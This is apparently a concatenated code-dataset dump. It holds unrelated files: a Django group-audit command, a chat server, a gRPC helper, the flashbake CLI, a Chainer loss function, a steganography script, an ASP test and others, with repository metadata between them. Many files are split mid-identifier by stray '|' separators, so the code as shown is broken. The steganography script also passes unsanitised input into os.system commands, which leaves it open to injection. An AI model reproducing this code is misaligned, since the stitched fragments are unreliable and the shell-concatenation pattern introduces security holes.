# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
Audit groups and remove inactive users.
"""
import datetime
from django.contrib.auth.models import Group, User
from django.contrib.admin.models import LogEntry, CHANGE
from django.contrib.contenttypes.models import ContentType
from django.core.management.base import BaseCommand
from django.utils import timezone
from crashstats.authentication.models import PolicyException
VALID_EMAIL_DOMAINS = ("mozilla.com", "mozilla.org")
def get_or_create_auditgroups_user():
try:
return User.objects.get(username="auditgroups")
except User.DoesNotExist:
return User.objects.create_user(
username="auditgroups",
email="auditgroups@example.com",
first_name="SYSTEMUSER",
last_name="DONOTDELETE",
is_active=False,
)
def delta_days(since_datetime):
"""Return the delta in days between now and since_datetime"""
return (timezone.now() - since_datetime).days
class Command(BaseCommand):
help = "Audits Django groups and removes inactive users."
def add_arguments(self, parser):
parser.add_argument(
"--dry-run", action="store_true", help="Whether or not to do a dry run."
)
def is_employee_or_exception(self, user):
# If this user has a policy exception, then they're allowed
if PolicyException.objects.filter(user=user).exists():
return True
if user.email.endswith(VALID_EMAIL_DOMAINS):
return True
return False
def audit_hackers_group(self, dryrun=True):
# Figure out the cutoff date for inactivity
cutoff = timezone.now() - datetime.timedelta(days=365)
self.stdout.write("Using cutoff: %s" % cutoff)
# Get all users in the "Hackers" group
try:
hackers_group = Group.objects.get(name="Hackers")
except Group.DoesNotExist:
self.stdout.write('"Hackers" group does not exist.')
return
# Go through the users and mark the ones for removal
users_to_remove = []
for user in hackers_group.user_set.all():
if not user.is_active:
users_to_remove.append((user, "!is_active"))
elif not self.is_employee_or_exception(user):
users_to_remove.append((user, "not employee or exception"))
elif user.last_login and user.last_login < cutoff:
days = delta_days(user.last_login)
# This user is inactive. Check for active API tokens.
active_tokens = [
token for token in user.token_set.all() if not token.is_expired
]
if not active_tokens:
users_to_remove.append((user, "inactive %sd, no tokens" % days))
else:
self.stdout.write(
"SKIP: %s (inactive %sd, but has active tokens: %s)"
% (user.email, days, len(active_tokens))
)
auditgroups_user = get_or_create_auditgroups_user()
# Log or remove the users that have been marked
for user, reason in users_to_remove:
self.stdout.write("Removing: %s (%s)" % (user.email, reason))
if dryrun is False:
hackers_group.user_set.remove(user)
# Toss a LogEntry in so we can keep track of when people get
# de-granted and what did it
|
LogEntry.objects.log_action(
user_id=auditgrou
|
ps_user.id,
content_type_id=ContentType.objects.get_for_model(User).pk,
object_id=user.pk,
object_repr=user.email,
action_flag=CHANGE,
change_message="Removed %s from hackers--%s."
% (user.email, reason),
)
self.stdout.write("Total removed: %s" % len(users_to_remove))
def handle(self, **options):
dryrun = options["dry_run"]
if dryrun:
self.stdout.write("Dry run--this is what we think should happen.")
self.audit_hackers_group(dryrun=dryrun)
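# Hedged usage note (assumption, not part of the original command): as a Django
# management command this module would typically be invoked as
#     python manage.py auditgroups --dry-run
# where --dry-run only reports the users that would be removed.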
|
justasabc/python_tutorials
|
project/chat/chatserver.py
|
Python
|
gpl-3.0
| 1,221
| 0.039312
|
# Note: run this server by using python2.7 instead of python3.2
from asyncore import dispatcher
from asynchat import async_chat
import
|
socket, asyncore
IP = ''
PORT = 5555
SEP = '\n'
class ChatSession(async_chat):
"""
A simple chat session corresponding to a client
"""
def __init__(self,sock):
async_chat.__init__(self,sock)
self.set_terminator(SEP)
self.data = []
def collect_incoming_data(self, data):
print("---------------collect_incoming_data")
self.data.append(data)
def found_te
|
rminator(self):
print("---------------found_terminator")
line = ''.join(self.data)
self.data = []
print(line)
class ChatServer(dispatcher):
"""
    A simple chat server.
    A server has n clients and n sessions.
"""
def __init__(self, ip,port):
dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind((ip,port))
self.listen(5)
# store all sessions
self.sessions = []
def handle_accept(self):
conn, addr = self.accept()
print("Connection from {0}".format(addr))
# create and store session
cs = ChatSession(conn)
self.sessions.append(cs)
if __name__ == '__main__':
s = ChatServer(IP,PORT)
try:
asyncore.loop()
except KeyboardInterrupt:
pass
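# Hedged usage note (assumption, not part of the original script): the server
# listens on port 5555 and can be exercised from another terminal with a raw
# TCP client, e.g.
#     telnet localhost 5555
# Each line terminated by '\n' is collected by ChatSession and printed to the
# server's stdout by found_terminator().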
|
bearbear12345/school_SDD_prelimYear
|
Assessments/AS4 - NCSS Python Programming Challenge/NCSS Challenge (Advanced) 2016/1.2.3 - Box in a Box.py
|
Python
|
gpl-3.0
| 736
| 0.046196
|
def genbox(i):
i = int(i)
def draw(size, yc, xc):
y = yc
for _ in range(0,size):
if _ == 0 or _ == size-1:
x = xc
i = 0
while i < size:
if not g[_+y][x]=="x": g[_+y][x] = "x"
x += 2
i+=1
|
else:
if not g[_+y][xc]=="x": g[_+y][xc] = "x"
if not g[_+y][(len(g[0])-xc-1)]=="x": g[_+y][(len(g[0])-xc-1)] = "x"
pass
g = []
for _ in range(1,i+1):
h = []
for _ in range(1,2*i):
h.append(" ")
g.append(h)
c = i
a = 0
|
b = 0
while c > 0:
draw(c,a,b)
c -= 4
a += 2
b += 4
output = ""
for row in g:
output += "".join(row) + "\n"
return output.strip()
print(genbox(input("Enter size: ")))
|
hanamvu/C4E11
|
SS1/tur_a_circle.py
|
Python
|
gpl-3.0
| 313
| 0.025559
|
from turtle import *
from rand
|
om import *
speed(0)
colormode(255)
for side_n in range(15,2,-1):
color((randint(1, 255),randint(1, 255),randint(1, 255)),(randint(1, 255),randint(1, 255),randint(1, 255)))
begin_fill()
for i in range(side_n):
forward(
|
100)
left(360/side_n)
end_fill()
|
rackerlabs/django-DefectDojo
|
dojo/db_migrations/0022_google_sheet_sync_additions.py
|
Python
|
bsd-3-clause
| 963
| 0
|
# Generated by Django 2.2.1 on 2019-09-19 11:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dojo', '0021_cve_index'),
]
operations = [
migrations.AddField(
model_name='system_settings',
name='credentials',
field=models.CharField(max_length=3000, blank=True),
),
migrations.Add
|
Field(
model_name='system_settings',
name='column_widths',
field=models.CharField(max_length=1500, blank=True),
),
migrations.AddF
|
ield(
model_name='system_settings',
name='drive_folder_ID',
field=models.CharField(max_length=100, blank=True),
),
migrations.AddField(
model_name='system_settings',
name='enable_google_sheets',
field=models.BooleanField(null=True, blank=True, default=False),
),
]
|
ctiller/grpc
|
tools/run_tests/xds_k8s_test_driver/framework/rpc/grpc.py
|
Python
|
apache-2.0
| 3,227
| 0
|
# Copyright 2020 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
from typing import ClassVar, Dict, Optional
from google.protobuf import json_format
import google.protobuf.message
import grpc
logger = logging.getLogger(__name__)
# Type aliases
Message = google.protobuf.message.Message
class GrpcClientHelper:
channel: grpc.Channel
DEFAULT_RPC_DEADLINE_SEC = 90
def __init__(self, channel: grpc.Channel, stub_class: ClassVar):
self.channel = channel
self.stub = stub_class(channel)
# This is purely cosmetic to make RPC logs look like method calls.
self.log_service_name = re.sub('Stub$', '',
self.stub.__class__.__name__)
def call_unary_with_deadline(
self,
*,
rpc: str,
req: Message,
deadline_sec: Optional[int] = DEFAULT_RPC_DEADLINE_SEC,
lo
|
g_level: Optional[int] = logging.DEBUG) -> Message:
if deadline_sec is None:
deadline_sec = self.DEFAULT_RPC_DEADLINE_SEC
call_kwargs = dict(wait_for_ready=True, timeout=deadline_sec)
self._log_rpc_request(rpc, req, call_kwargs, log_
|
level)
# Call RPC, e.g. RpcStub(channel).RpcMethod(req, ...options)
rpc_callable: grpc.UnaryUnaryMultiCallable = getattr(self.stub, rpc)
return rpc_callable(req, **call_kwargs)
def _log_rpc_request(self, rpc, req, call_kwargs, log_level=logging.DEBUG):
logger.log(logging.DEBUG if log_level is None else log_level,
'RPC %s.%s(request=%s(%r), %s)', self.log_service_name, rpc,
req.__class__.__name__, json_format.MessageToDict(req),
', '.join({f'{k}={v}' for k, v in call_kwargs.items()}))
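# Hedged usage sketch (assumption, not part of the original module): a helper
# would typically wrap a generated stub class, e.g. (test_pb2 / test_pb2_grpc
# are hypothetical generated modules)
#     helper = GrpcClientHelper(grpc.insecure_channel('localhost:50051'),
#                               test_pb2_grpc.TestServiceStub)
#     reply = helper.call_unary_with_deadline(rpc='UnaryCall',
#                                             req=test_pb2.SimpleRequest())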
class GrpcApp:
channels: Dict[int, grpc.Channel]
class NotFound(Exception):
"""Requested resource not found"""
def __init__(self, message):
self.message = message
super().__init__(message)
def __init__(self, rpc_host):
self.rpc_host = rpc_host
# Cache gRPC channels per port
self.channels = dict()
def _make_channel(self, port) -> grpc.Channel:
if port not in self.channels:
target = f'{self.rpc_host}:{port}'
self.channels[port] = grpc.insecure_channel(target)
return self.channels[port]
def close(self):
# Close all channels
for channel in self.channels.values():
channel.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def __del__(self):
self.close()
|
commandline/flashbake
|
src/flashbake/console.py
|
Python
|
gpl-3.0
| 11,505
| 0.005389
|
#!/usr/bin/env python
''' flashbake - wrapper script that will get installed by setup.py into the execution path '''
# copyright 2009 Thomas Gideon
#
# This file is part of flashbake.
#
# flashbake is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# flashbake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with flashbake. If not, see <http://www.gnu.org/licenses/>.
from flashbake import commit, context, control
from flashbake.plugins import PluginError, PLUGIN_ERRORS
from optparse import OptionParser
from os.path import join, realpath
import flashbake.git
import fnmatch
import logging
import os.path
import sys
VERSION = flashbake.__version__
pattern = '.flashbake'
def main():
''' Entry point used by the setup.py installation script. '''
# handle options and arguments
parser = _build_main_parser()
(options, args) = parser.parse_args()
if options.quiet and options.verbose:
parser.error('Cannot specify both verbose and quiet')
# configure logging
level = logging.INFO
if options.verbose:
level = logging.DEBUG
if options.quiet:
level = logging.ERROR
logging.basicConfig(level=level,
format='%(message)s')
home_dir = os.path.expanduser('~')
# look for plugin directory
_load_plugin_dirs(options, home_dir)
if len(args) < 1:
parser.error('Must specify project directory.')
sys.exit(1)
project_dir = args[0]
# look for user's default control file
hot_files, control_config = _load_user_control(home_dir, project_dir, options)
# look for project control file
control_file = _find_control(parser, project_dir)
if None == control_file:
sys.exit(1)
# emit the context message and exit
if options.context_only:
sys.exit(_context_only(options, project_dir, control_file, control_config, hot_files))
quiet_period = 0
if len(args) == 2:
try:
quiet_period = int(args[1])
except:
parser.error(f'Quiet minutes, "{args[1]}", must be a valid number.' )
sys.exit(1)
try:
(hot_files, control_config) = control.parse_control(project_dir, control_file, control_config, hot_files)
control_config.context_only = options.context_only
control_config.dry_run = options.dryrun
if (options.dryrun):
logging.info('========================================')
logging.info('!!! Running in dry run mode. !!!')
logging.info('!!! No changes will be committed. !!!')
logging.info('========================================\n\n')
(hot_files, control_config) = control.prepare_control(hot_files, control_config)
if options.purge:
commit.purge(control_config, hot_files)
else:
commit.commit(control_config, hot_files, quiet_period)
if (options.dryrun):
logging.info('\n\n========================================')
logging.info('!!! Running in dry run mode. !!!')
logging.info('!!! No changes will be committed. !!!')
logging.info('========================================')
except (flashbake.git.VCError, flashbake.ConfigError) as error:
logging.error(f'Error: {str(error)}' )
sys.exit(1)
except PluginError as error:
_handle_bad_plugin(error)
sys.exit(1)
def multiple_projects():
parser = _build_multi_parser()
(options, args) = parser.parse_args()
if len(args) < 1:
parser.error('Must specify root search directory.')
sys.exit(1)
flashbake_opts = options.flashbake_options.split()
# verify --options will pass to main flashbake program
test_argv = sys.argv[0:1] + flashbake_opts + ['.'] + args[1:]
main_parser = _build_main_parser()
main_parser.suppress_exit = True
try:
(test_options, test_args) = main_parser.parse_args(test_argv)
except ParserError as err:
msg = "error with arguments passed to main flashbake: %s\n%s" % (
"'" + "' '".join(
flashbake_opts + ['<project_dir>'] + args[1:]) + "'",
err.msg.replace(parser.get_prog_name() + ':', '> '))
parser.exit(err.code, msg)
exit_code = 0
for project in _locate_projects(args[0]):
print (f"project: {project}")
sys.argv = sys.argv[0:1] + flashbake_opts + [project] + args[1:]
try:
main()
except SystemExit as err:
if err.code != 0:
exit_code = err.code
logging.error(f"Error: 'flashbake' had an error for '{project}'"
)
sys.exit(exit_code)
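# Hedged usage note (assumption, not part of the original module): the
# multi-project entry point would be invoked roughly as
#     <multi-project command> --options "-q" ~/projects 5
# which re-runs main() once per directory under ~/projects that contains a
# '.flashbake' control file, passing "-q" and the 5-minute quiet period through.
# (The installed command name comes from setup.py and is not shown here.)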
def _locate_projects(root):
for path, dirs, files in os.walk(root): #@UnusedVariable
for project_path in (
os.path.normpath(path) for filename in files \
if fnmatch.fnmatch(filename, pattern)):
yield project_path
class ParserError(RuntimeError):
def __init__(self, code=0, msg=''):
RuntimeError.__init__(self, code, msg)
def _get_msg(self):
return self.args[1]
def _get_code(self):
return self.args[0]
msg = property(_get_msg)
code = property(_get_code)
class FlashbakeOptionParser(OptionParser):
def __init__(self, *args, **kwargs):
OptionParser.__init__(self, *args, **kwargs)
self.suppress_exit =
|
False
def print_usage(self, file=None):
if not self.suppress_exit:
OptionPars
|
er.print_usage(self, file)
def exit(self, status=0, msg=None):
if self.suppress_exit:
raise ParserError(status, msg)
else:
OptionParser.exit(self, status, msg)
def _build_main_parser():
usage = "usage: %prog [options] <project_dir> [quiet_min]"
parser = FlashbakeOptionParser(
usage=usage, version='{0} {1}'.format('%prog', VERSION))
parser.add_option('-c', '--context', dest='context_only',
action='store_true', default=False,
help='just generate and show the commit message, don\'t check for changes')
parser.add_option('-v', '--verbose', dest='verbose',
action='store_true', default=False,
help='include debug information in the output')
parser.add_option('-q', '--quiet', dest='quiet',
action='store_true', default=False,
                      help='disable all output except errors')
parser.add_option('-d', '--dryrun', dest='dryrun',
action='store_true', default=False,
help='execute a dry run')
parser.add_option('-p', '--plugins', dest='plugin_dir',
action='store', type='string', metavar='PLUGIN_DIR',
help='specify an additional location for plugins')
parser.add_option('-r', '--purge', dest='purge',
action='store_true', default=False,
help='purge any files that have been deleted from source control')
return parser
def _build_multi_parser():
usage = "usage: %prog [options] <search_root> [quiet_min]"
parser = FlashbakeOptionParser(
usage=usage, version='{0} {1}'.format ('%prog', VERSION))
parser.add_option('-o', '--options', dest='flashbake_options', default='',
action='store', type='string', metavar='FLASHBAKE_OPTS',
help=("options to pass through to the 'flashbake' "
"command. Use quotes to pass multiple arguments."))
return parser
def _load_plugin_dirs(options, home_dir):
plugin_dir = join(home_dir, '.flashbake', 'plugins')
if os.path.exists(plugin_dir):
real_plugin_dir = realpath(plugin_dir)
logging.debug
|
atopuzov/pyzebos
|
setup.py
|
Python
|
mit
| 2,544
| 0.00118
|
# -*- coding: utf-8 -*-
# The MIT License (MIT)
# Copyright (c) 2014 Aleksandar Topuzović <aleksandar.topuzovic@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documenta
|
tion files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice sha
|
ll be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
import sys
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['--strict', '--verbose', '--tb=long',
'--cov', 'pyzebos', '--cov-report',
'term-missing', 'tests']
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
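# Hedged usage note (assumption): with the cmdclass mapping below, the test
# suite would be run via
#     python setup.py test
# which invokes pytest with the coverage options configured in
# finalize_options() above.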
setup(
author='Aleksandar Topuzović',
author_email='aleksandar.topuzovic@gmail.com',
classifiers=[
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
'Topic :: Software Development :: Library',
],
cmdclass={'test': PyTest},
description='Parser for ZebOS routing configuration',
install_requires=['pyparsing'],
keywords='pyparsing parser zebos quagga',
license='MIT License',
long_description="",
name='pyzebos',
package_data={'': ['LICENSE']},
package_dir={'pyzebos': 'pyzebos'},
packages=find_packages(exclude=['docs', 'tests*']),
setup_requires=['flake8'],
tests_require=['pytest', 'pytest-cov'],
url='https://github.com/atopuzov/pyzebos',
version='0.0.1',
)
|
agusmakmun/Some-Examples-of-Simple-Python-Script
|
Stegano-Extract-and-Read-File-From-Image/script.py
|
Python
|
agpl-3.0
| 2,974
| 0.025891
|
"""
Name : Stegano Extract and Read File From Image
Created By : Agus Makmun (Summon Agus)
Blog : bloggersmart.net - python.web.id
License : GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007
Documentation : https://github.com/agusmakmun/Some-Examples-of-Simple-Python-Script/
"""
import os
import time, zipfile
class scureImage(object):
def _secure(self, image, zipfile, new_image):
return os.system("cat "+image+" "+zipfile+" > "+new_image)
def _openScure(self, new_image):
return os.system("unzip "+new_image)
def _stegano(self, zipFile):
archive = zipfile.ZipFile(zipFile, 'r')
list_name = archive.namelist()
print "[+] This list of files in the image."
print "+---------------------------------------+"
print " ", list_name
print "+---------------------------------------+"
file_open = raw_input("[+] Type file want to read.\n[+] >>> ")
try:
print "[+] This content of { "+file_open+" }"
print "+---------------------------------------+"
print archive.read(file_open)
print "+---------------------------------------+\n"
except KeyError:
print "[-] Uppss, {", file_open, "} is not found at this file."
print "[-] Please check again!"
def main(self):
print "\n\tWelcome to Python Scure Image { STEGANO METHOD }"
print "[+] Please choice this options:"
print " 1. Saved files in imag
|
e."
print " 2. Extract files from image."
print " 3. Stegano read file from image.\n"
mome = scureImage()
choice = raw_input("[+] >>> ")
if choice == "1":
print os.listdir(".")
img = raw_input("[+] Type Image file that will save your archive.\n[
|
+] >>> ")
zip = raw_input("[+] Type your Zip file: ")
new_img = raw_input("[+] Type New Image that will save your zip: ")
mome._secure(img, zip, new_img)
print os.listdir(".")
elif choice == "2":
print os.listdir(".")
new_img = raw_input("[+] Type Image that will going to Extract all files.\n[+] >>> ")
mome._openScure(new_img)
time.sleep(2)
print os.listdir(".")
elif choice == "3":
print os.listdir(".")
zipName = raw_input("[+] Type Image where your file was saved.\n[+] >>> ")
try:
mome._stegano(zipName)
except IOError:
print "[-] Uppss, {", zipName, "} is not image or not found at this directory."
print "[-] Please check again!"
if __name__ == "__main__":
mome = scureImage()
mome.main()
|
AlpacaDB/chainer
|
chainer/functions/loss/negative_sampling.py
|
Python
|
mit
| 6,667
| 0
|
import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
class NegativeSamplingFunction(function.Function):
def __init__(self, sampler, sample_size):
self.sampler = sampler
self.sample_size = sample_size
def _make_samples(self, t):
if hasattr(self, 'samples'):
return self.samples # for testing
size = int(t.shape[0])
# first one is the positive, and others are sampled negatives
samples = self.sampler((size, self.sample_size + 1))
samples[:, 0] = t
self.samples = samples
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 3)
x_type, t_type, w_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 2,
t_type.dtype == numpy.int32,
t_type.ndim == 1,
x_type.shape[0] == t_type.shape[0],
w_type.dtype == numpy.float32,
w_type.ndim == 2,
)
def forward_cpu(self, inputs):
x, t, W = inputs
self._make_samples(t)
loss = numpy.float32(0.0)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = W[k]
f = w.dot(ix)
f[0] *= -1 # positive sample
loss += numpy.sum(numpy.logaddexp(f, 0))
return numpy.array(loss, numpy.float32),
def forward_gpu(self, inputs):
x, t, W = inputs
n_in = x.shape[1]
self._make_samples(t)
self.wx = cuda.elementwise(
'raw T W, raw T x, S k, int32 c, int32 m', 'T wx',
'''
T f = 0;
for (int j = 0; j < c; ++j) {
int x_ind[] = {(i / m), j};
int w_ind[] = {k, j};
f += x[x_ind] * W[w_ind];
}
wx = f;
''',
'negative_sampling_wx'
)(W, x, self.samples, n_in, self.sample_size + 1)
y = cuda.elementwise(
'T wx, int32 c, int32 m', 'T y',
'''
T f = wx;
if (i % m == 0) {
f = -f;
}
T loss;
if (f < 0) {
loss = __logf(1 + __expf(f));
|
} else {
loss = f + __logf(1 + __expf(-f));
}
y = l
|
oss;
''',
'negative_sampling_forward'
)(self.wx, n_in, self.sample_size + 1)
# TODO(okuta): merge elementwise
loss = cuda.cupy.sum(y)
return loss,
def backward_cpu(self, inputs, grads):
x, t, W = inputs
gloss, = grads
gx = numpy.zeros_like(x)
gW = numpy.zeros_like(W)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = W[k]
f = w.dot(ix)
# g == -y * gloss / (1 + exp(yf))
f[0] *= -1
g = gloss / (1 + numpy.exp(-f))
g[0] *= -1
gx[i] = g.dot(w)
for ik, ig in six.moves.zip(k, g):
gW[ik] += ig * ix
return gx, None, gW
def backward_gpu(self, inputs, grads):
cupy = cuda.cupy
x, t, W = inputs
gloss, = grads
n_in = x.shape[1]
g = cuda.elementwise(
'T wx, raw T gloss, int32 m', 'T g',
'''
T y;
if (i % m == 0) {
y = 1;
} else {
y = -1;
}
g = -y * gloss[0] / (1.0f + __expf(wx * y));
''',
'negative_sampling_calculate_g'
)(self.wx, gloss, self.sample_size + 1)
gx = cupy.zeros_like(x)
cuda.elementwise(
'raw T g, raw T W, raw S k, int32 c, int32 m', 'T gx',
'''
int d = i / c;
T w = 0;
for (int j = 0; j < m; ++j) {
w += g[d * m + j] * W[k[d * m + j] * c + i % c];
}
gx = w;
''',
'negative_sampling_calculate_gx'
)(g, W, self.samples, n_in, self.sample_size + 1, gx)
gW = cupy.zeros_like(W)
cuda.elementwise(
'T g, raw T x, S k, int32 c, int32 m', 'raw T gW',
'''
T gi = g;
for (int j = 0; j < c; ++j) {
atomicAdd(&gW[k * c + j], gi * x[(i / m) * c + j]);
}
''',
'negative_sampling_calculate_gw'
)(g, x, self.samples, n_in, self.sample_size + 1, gW)
return gx, None, gW
def negative_sampling(x, t, W, sampler, sample_size):
"""Negative sampling loss function.
    In natural language processing, especially language modeling, the size of
    the vocabulary is very large.
Therefore, you need to spend a lot of time to calculate the gradient of the
embedding matrix.
Instead, in negative sampling trick, you only need to calculate the
gradient for a few sampled negative examples.
The objective function is below:
.. math::
f(x, p) = \\log \\sigma(x^\\top w_p) + \\
k E_{i \\sim P(i)}[\\log \\sigma(- x^\\top w_i)],
where :math:`\\sigma(\\cdot)` is a sigmoid function, :math:`w_i` is the
weight vector for the word :math:`i`, and :math:`p` is a positive example.
It is approximated with :math:`k` examples :math:`N` sampled from
probability :math:`P(i)`, like this:
.. math::
f(x, p) \\approx \\log \\sigma(x^\\top w_p) + \\
\\sum_{n \\in N} \\log \\sigma(-x^\\top w_n).
Each sample of :math:`N` is drawn from the word distribution :math:`P(w)`.
This is calculated as :math:`P(w) = \\frac{1}{Z} c(w)^\\alpha`, where
:math:`c(w)` is the unigram count of the word :math:`w`, :math:`\\alpha` is
a hyper-parameter, and :math:`Z` is the normalization constant.
Args:
x (~chainer.Variable): Batch of input vectors.
t (~chainer.Variable): Vector of ground truth labels.
W (~chainer.Variable): Weight matrix.
sampler (~types.FunctionType): Sampling function. It takes a shape and
returns an integer array of the shape. Each element of this array
is a sample from the word distribution.
A :class:`~chainer.utils.WalkerAlias` object built with the power
distribution of word frequency is recommended.
sample_size (int): Number of samples.
See: `Distributed Representations of Words and Phrases and their\
Compositionality <http://arxiv.org/abs/1310.4546>`_
.. seealso:: :class:`~chainer.links.NegativeSampling`.
"""
return NegativeSamplingFunction(sampler, sample_size)(x, t, W)
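# Hedged usage sketch (assumption, not part of the original module): following
# the docstring above, a sampler is typically a WalkerAlias built from the
# word-count power distribution, e.g.
#     sampler = chainer.utils.WalkerAlias(counts ** 0.75)
#     loss = negative_sampling(x, t, W, sampler.sample, sample_size=5)
# where `counts` is a hypothetical numpy array of unigram counts.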
|
Yarrick13/hwasp
|
tests/asp/gringo/modelchecker.046.test.py
|
Python
|
apache-2.0
| 186,113
| 0.00029
|
input = """
p24|p8|not_p15:-p7,p2,not p25.
p11|not_p20|p8|not_p15:-p24,p2.
p3|p20|p18|p3:-p1,not p22.
not_p5|not_p5|not_p19|p22.
p1|p12|p2|not_p16:-not p23,not p3.
p3|not_p20|p18:-p13,not p22,not p14.
p17|p12|p8|not_p8.
p15|not_p22|p24|not_p12.
not_p21|p20|p18:-p1,not p22.
p24|p9|p24|not_p22:-p12,p23.
not_p2|not_p24|p9:-p1,p12,not p11.
p11|not_p20|not_p1|not_p4:-p24,p2.
p2|p24|p15:-not p23.
p24|p9|p24|p10:-p12,p23.
:-p19,not_p19.
p15|p4|p3|p1:-p12,p5.
p21|p5|p12|not_p20:-p14.
p12|not_p15|p16|p17:-p6,p1.
p1|p14|p2|p11:-not p5,p24.
not_p22|p24|p15:-not p23.
not_p21|p20|p18|p3:-p13,not p22.
p17|p12|p8|p25.
p15|p6:-p19,p5,not p3,not p7.
not_p25|p14|p9|not_p3.
:-p16,not_p16.
not_p23|p7|p21|p5:-p13,not p3.
p1|p15|p15|p11:-not p5,p24.
p6|not_p15|p7|p17:-p6,p1.
p3|p20|p18:-p1,not p22.
p19|p1|p12:-p19,not p23,not p11.
p24|not_p8|p6|not_p22:-p12,p23.
p5|p11|p25|not_p20:-p17,not p7.
p6|p9|p6|not_p22:-p19,p23.
not_p5:-not p5.
p1|p15|p15|not_p18:-not p5,p24.
p6|p7:-p19,not p23,not p3,not p11.
p6|p4|p7|p18:-p9,p1.
p24|p9|p24|not_p22:-p19,p23.
p11|p8|p4|p16.
p21|p22|p11|p25|not_p20:-p17.
not_p20|not_p1|not_p4:-p7,p2,not p25.
not_p21|p15|p22|not_p12.
not_p23|p7|not_p17|p5:-p13,not p3.
p21|p5|p12|not_p20:-p17.
p12|not_p15|p16|p18:-p9,p1.
p15|p11|p24|p3.
p21|p22|p12|p25|not_p20:-p14.
p3|p21|not_p20:-p6,p23,not p4.
p17|p6|not_p19|not_p8.
not_p4:-not p4.
"""
output = """
{p25, p18, p1, not_p5, p17, p15, not_p4, p21, p14, p16}
{p25, p20, p1, not_p5, p17, p15, not_p4, p21, p14, p16}
{p2, p25, not_p5, p17, p15, not_p4, p21, p14, p16}
{p25, p18, p1, not_p5, p17, p15, not_p4, p21, p16, not_p3}
{p25, p20, p1, not_p5, p17, p15, not_p4, p21, p16, not_p3}
{p2, p25, not_p5, p17, p15
|
, not_p4, p21, p16, not_p3}
{p25, p18, p1, not_p5, p17, p15, not_p4, p21, p16, not_p25}
{p25, p20, p1, not_p5, p17, p15, not_p4, p21, p16, not_p25}
{p2, p25, not_p5, p17, p15, not_p4, p21, p16, not_p25}
{p7, p20, p1, not_p5, p17, p15, p9, not_p4, p21, p16}
{p11, p20, p1, not_p5, p17, p15, p9, not_p4, p21, p16, p6}
{p25, p20, p1, not_p5, p17, p15, p9, not_p4, p21, p16, p6}
{p25, p18, p1, not_p5, p17, p15, p9, not_p4, p21, p16}
{p2, p25,
|
not_p5, p17, p15, p9, not_p4, p21, p16}
{not_p20, not_p5, p12, p17, p15, not_p4, p16, not_p3}
{not_p20, p18, p1, not_p5, p17, p15, not_p4, p16, not_p3}
{not_p20, p20, p1, not_p5, p17, p15, not_p4, p16, not_p3}
{p2, not_p20, not_p5, p17, p15, not_p4, p16, not_p3}
{not_p20, not_p5, p12, p17, p15, not_p4, p16, not_p25}
{not_p20, p18, p1, not_p5, p17, p15, not_p4, p16, not_p25}
{not_p20, p20, p1, not_p5, p17, p15, not_p4, p16, not_p25}
{p2, not_p20, not_p5, p17, p15, not_p4, p16, not_p25}
{not_p20, not_p5, p12, p17, p15, not_p4, p14, p16}
{not_p20, p18, p1, not_p5, p17, p15, not_p4, p14, p16}
{not_p20, p20, p1, not_p5, p17, p15, not_p4, p14, p16}
{p2, not_p20, not_p5, p17, p15, not_p4, p14, p16}
{not_p20, p18, p1, not_p5, p17, p15, p9, not_p4, p16}
{not_p20, p20, p1, not_p5, p17, p15, p9, not_p4, p16, p6}
{p7, not_p20, p20, p1, not_p5, p17, p15, p9, not_p4, p16}
{not_p20, not_p5, p12, p17, p15, p9, not_p4, p16}
{p2, not_p20, not_p5, p17, p15, p9, not_p4, p16}
{p25, not_p5, p12, p17, p15, not_p4, p16, not_p3}
{p25, not_p5, p12, p17, p15, not_p4, p16, not_p25}
{p25, not_p5, p12, p17, p15, not_p4, p14, p16}
{p25, not_p5, p12, p17, p15, p9, not_p4, p16}
{p2, p25, not_p5, not_p8, p15, not_p4, p16, not_p3}
{p25, p18, p1, not_p5, not_p8, p15, not_p4, p16, not_p3}
